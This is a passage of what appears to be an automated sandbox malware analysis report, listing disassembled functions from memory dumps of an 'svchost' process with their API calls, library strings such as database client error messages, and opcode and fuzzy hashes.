                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F55A7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: isdigitislowerisspaceisxdigit
                                                                                            • String ID:
                                                                                            • API String ID: 991065306-0
                                                                                            • Opcode ID: 3e7a2c194a5707312c8dda877a588ef86d65e8615c8665a23fac9bd322b4b4cb
                                                                                            • Instruction ID: bb26755f7ae3b91839138492e83f78a8efb992d0ceec12b3b31c80b096e0dd76
                                                                                            • Opcode Fuzzy Hash: 3e7a2c194a5707312c8dda877a588ef86d65e8615c8665a23fac9bd322b4b4cb
                                                                                            • Instruction Fuzzy Hash: 54514622F1F16246FB308B18956037E7AD2AB44748F8D2131DF9E673D2DE2EEC058608
                                                                                            Function 00007FFDA36DE080 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$freerealloc
                                                                                            • String ID:
                                                                                            • API String ID: 696964274-0
                                                                                            • Opcode ID: 9ffabb0dab98a52268d714b4266e7b13c75daf8d67ddf8f8b86f461290b40781
                                                                                            • Instruction ID: b9b6189e79755a070fa2332cfc40cc6f9f3a0ee01b48a0262fb0ea4cf895080a
                                                                                            • Opcode Fuzzy Hash: 9ffabb0dab98a52268d714b4266e7b13c75daf8d67ddf8f8b86f461290b40781
                                                                                            • Instruction Fuzzy Hash: 8151C423B0BE9689FB658B64983037DBF929B05BD4F4C5631D66E227C3DE2F90558208
                                                                                            Function 00007FFDA36DDD30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000,00007FFDA36DDA51), ref: 00007FFDA36DDEAD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: column number %d is out of range 0..%d$out of memory$row number %d is out of range 0..%d
                                                                                            • API String ID: 3510742995-252844271
                                                                                            • Opcode ID: da5edc23f87b53490ded33621c4f4f6963b288cd677c6f8c1d0c6315c280e1fe
                                                                                            • Instruction ID: 24f08a76242585fbc72b7453cf6f2562c408327ec7f0345279b14859777155d9
                                                                                            • Opcode Fuzzy Hash: da5edc23f87b53490ded33621c4f4f6963b288cd677c6f8c1d0c6315c280e1fe
                                                                                            • Instruction Fuzzy Hash: 3151BD33B0AB4286FB50AF15E5602B967A2EF54BC4F1CA531DE0D27796DF3AE4118308
                                                                                            Function 66001010 Relevance: 6.1, APIs: 4, Instructions: 124sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep_amsg_exit
                                                                                            • String ID:
                                                                                            • API String ID: 1015461914-0
                                                                                            • Opcode ID: 00a1a00ef9f6fad419ea6f81d8f8bc600c2ddcf5b5d0ff3bac86aba5ef169f44
                                                                                            • Instruction ID: 2d0b610cf794b2bae2ebf3ebeb5f13edb644dff399755fc9777f3e2269dcfd8d
                                                                                            • Opcode Fuzzy Hash: 00a1a00ef9f6fad419ea6f81d8f8bc600c2ddcf5b5d0ff3bac86aba5ef169f44
                                                                                            • Instruction Fuzzy Hash: 5041F032B0665486F7068BCAED5039A2AA6B7987D8F8448B6DE0C47350DF7BC8D1C340
                                                                                            Function 00007FFDA36DF890 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: another command is already in progress$cannot queue commands during COPY$no connection to the server
                                                                                            • API String ID: 2163055111-3353571757
                                                                                            • Opcode ID: 75f88c50db84c2ec0b0f3e8b12d6debfb989c9555dda38240986ce09991c5eda
                                                                                            • Instruction ID: f94b094847e4502ce475bace59890240f27c8048f99e8b811c89bc7dd4986281
                                                                                            • Opcode Fuzzy Hash: 75f88c50db84c2ec0b0f3e8b12d6debfb989c9555dda38240986ce09991c5eda
                                                                                            • Instruction Fuzzy Hash: 72415822B0BA4395FA549A1295343B91292AF09BC4F5C7036DA0E6E38BDF7FE0458718
                                                                                            Function 66016190 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: //IGNORE$//TRANSL$CP437
                                                                                            • API String ID: 0-2645255569
                                                                                            • Opcode ID: 478be36a9ae49c2bcf651dce55d74bac0e7665bc020284558af0c4a8de8f6a9d
                                                                                            • Instruction ID: d1d1838c2131378fab6907f5fb0a6fd6b5154e1c3dd06049c9f5a4373e6498f4
                                                                                            • Opcode Fuzzy Hash: 478be36a9ae49c2bcf651dce55d74bac0e7665bc020284558af0c4a8de8f6a9d
                                                                                            • Instruction Fuzzy Hash: 5A3128B2B3DA9094EF118BD79D0879EEFA2A752BC8F848131DE0447301DB6AC996C340
                                                                                            Function 00007FFDA36EB840 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfreemallocrealloc
                                                                                            • String ID:
                                                                                            • API String ID: 1052548509-0
                                                                                            • Opcode ID: 5e4c0247acb7fb60c567625a62fec96effb51d1eac2fb46d4f0ea471cb302272
                                                                                            • Instruction ID: 4f4e80035cbee8abcfc1ade8f0827221ecf944f5adc6f2d451a7e792b649730b
                                                                                            • Opcode Fuzzy Hash: 5e4c0247acb7fb60c567625a62fec96effb51d1eac2fb46d4f0ea471cb302272
                                                                                            • Instruction Fuzzy Hash: 44412A32A09B8282EF518F25D4A03F96761EF89F84F6D1136CE0E5B359DE3AD445C750
                                                                                            Function 00007FFDA36E6EF0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: mallocmemset
                                                                                            • String ID: %s$insufficient data in "t" message$out of memory
                                                                                            • API String ID: 2882185209-824677079
                                                                                            • Opcode ID: 876e38004733227cce00c713f867f7f7533eda84ffb124a817d5fc5992d38dcf
                                                                                            • Instruction ID: 578cecaefe3089331df78aee14ee9c92ee435cec5fbf8a83026d179f961b7c4c
                                                                                            • Opcode Fuzzy Hash: 876e38004733227cce00c713f867f7f7533eda84ffb124a817d5fc5992d38dcf
                                                                                            • Instruction Fuzzy Hash: C541C271B0A64246FA54EB11E4602BAB792BF44B84F1C2034DF4D67787EF7EE5068308
                                                                                            Function 00007FFDA36E00E0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E0113
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E0171
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E01F3
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E0206
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 111713529-0
                                                                                            • Opcode ID: 61206e494067fd74966ae7ad8d563265d4ad5da0e993c83824ecd2e2e06bf238
                                                                                            • Instruction ID: cb8d332327f22807a9d37ed549717469e7ab407ae1a53c13ada8802b7756b25e
                                                                                            • Opcode Fuzzy Hash: 61206e494067fd74966ae7ad8d563265d4ad5da0e993c83824ecd2e2e06bf238
                                                                                            • Instruction Fuzzy Hash: D331F032B0AB4586EB02CB96E45427AB7A1FB48BA4F195235CE1C1B354DF79D086C304
                                                                                            Function 00007FFDA36EBF90 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFA8
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFE0
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EC079
                                                                                              • Part of subcall function 00007FFDA36EC330: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36EC1FC,?,?,?,?,?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36EC348
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freerealloc
                                                                                            • String ID:
                                                                                            • API String ID: 1152543572-0
                                                                                            • Opcode ID: d17e624561328d197d8c369512b54a5d02f75090a40c6d95cf4b23632d18d7ef
                                                                                            • Instruction ID: 5cda0524c757f553e1009431d557b61bed27fb5ad1bca21f6259ed3d676ea158
                                                                                            • Opcode Fuzzy Hash: d17e624561328d197d8c369512b54a5d02f75090a40c6d95cf4b23632d18d7ef
                                                                                            • Instruction Fuzzy Hash: B6318D32B0AB4682FA408F15E56027863A2FB44B91F6C6835DB5E27752DF3FE0648308
                                                                                            Function 6601C2E0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDBCSLeadByteEx.KERNEL32 ref: 6601C33A
                                                                                            • MultiByteToWideChar.KERNEL32 ref: 6601C37A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Byte$CharLeadMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 2561704868-0
                                                                                            • Opcode ID: b528a5f7d4bedd53cc173c595c393bed900677d5dbc489e5a65e6e232faf74ab
                                                                                            • Instruction ID: 6810b55668767b238df4b156055cbec41bc502c0d3bba2300ea973e87a54fa2d
                                                                                            • Opcode Fuzzy Hash: b528a5f7d4bedd53cc173c595c393bed900677d5dbc489e5a65e6e232faf74ab
                                                                                            • Instruction Fuzzy Hash: D131B97260C780CBE3118FA9F40035EBAA0F795794F848135EE9487794DB7EC586CB01
                                                                                            Function 00007FFDA36F3AB0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: isuppertolower
                                                                                            • String ID:
                                                                                            • API String ID: 2435887076-0
                                                                                            • Opcode ID: ea6510cb65a03e0dd597c536bc7b4f8370108ce7ccfa5c0e273dc10ecaf9978d
                                                                                            • Instruction ID: 06a50e76ea3fc796a8b7502c5de035e024fea3c45ce6599d84e29b297ac92b55
                                                                                            • Opcode Fuzzy Hash: ea6510cb65a03e0dd597c536bc7b4f8370108ce7ccfa5c0e273dc10ecaf9978d
                                                                                            • Instruction Fuzzy Hash: B621F921B0F64246F7689F25A47027967B3EF60B90F6C2035EA8957387DE3EE8455308
                                                                                            Function 00007FFDA36F3370 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$_get_osfhandle
                                                                                            • String ID:
                                                                                            • API String ID: 748951308-0
                                                                                            • Opcode ID: dd718b42b9c3bff85ffdf12fab0845dc376a17d4eb9fff37521e7bf011246c67
                                                                                            • Instruction ID: 793f52526f2c5c028a6ab222020bcb5adfe200dcf5fb52919c7d79ef4fc48af8
                                                                                            • Opcode Fuzzy Hash: dd718b42b9c3bff85ffdf12fab0845dc376a17d4eb9fff37521e7bf011246c67
                                                                                            • Instruction Fuzzy Hash: CF21B232F1AF8287F3198F25A6601292262FB44750F1C6231FB4913B96DF7EE4E08714
                                                                                            Function 00007FFDA36F39E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: isuppertolower
                                                                                            • String ID:
                                                                                            • API String ID: 2435887076-0
                                                                                            • Opcode ID: fcf03d5aeba3ef17c72fa77c62fac13a19fcd583cfb6c56cfbf7a769647cee9b
                                                                                            • Instruction ID: 76300125d854a7b5128f7c500b2c8e41f6d2013926e524a05992f37c2cdde462
                                                                                            • Opcode Fuzzy Hash: fcf03d5aeba3ef17c72fa77c62fac13a19fcd583cfb6c56cfbf7a769647cee9b
                                                                                            • Instruction Fuzzy Hash: E121F622B0F68286F7648F26906023D7793FB44740F5D2135EA9A63786DF7EE8058304
                                                                                            Function 00007FFDA36D1000 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36ECEE0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36ECF06
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D1070
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfree
                                                                                            • String ID: could not generate random salt$out of memory
                                                                                            • API String ID: 1865132094-3322310908
                                                                                            • Opcode ID: 1a77a3cdb8e7265c1fd99bac51829baf16fba5869b051bcb0611104aff5a721a
                                                                                            • Instruction ID: 8b52d5049fe49e516dd528048b229657c5db73e5f220858c0bd2f77cc181ae3c
                                                                                            • Opcode Fuzzy Hash: 1a77a3cdb8e7265c1fd99bac51829baf16fba5869b051bcb0611104aff5a721a
                                                                                            • Instruction Fuzzy Hash: 5F11D233B0AB4285FA50AB21F4601BA6362EB88BD4F581131EE4D97796DE3EE444C704
                                                                                            Function 00007FFDA36F6A48 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 5c2a016cec40ba654ac277186700b1d207a8606c0b51675e3f054c7d55c76a4e
                                                                                            • Instruction ID: 771c02b147c6407456e5f45afd818558cc1e09197d4ad135b1ebc9c338c4e9c4
                                                                                            • Opcode Fuzzy Hash: 5c2a016cec40ba654ac277186700b1d207a8606c0b51675e3f054c7d55c76a4e
                                                                                            • Instruction Fuzzy Hash: EC114822B16B018AFB00CB60E8652A833A4FB19758F481E31EE6D56BA5DF78D5988340
                                                                                            Function 00007FFD93F8AC78 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3450262240.00007FFD93D68000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFD93C40000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3450238565.00007FFD93C40000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450262240.00007FFD93C41000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450709409.00007FFD93F8B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450845636.00007FFD94086000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450876616.00007FFD94087000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450909460.00007FFD94088000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450944746.00007FFD9408A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3450978095.00007FFD9408E000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
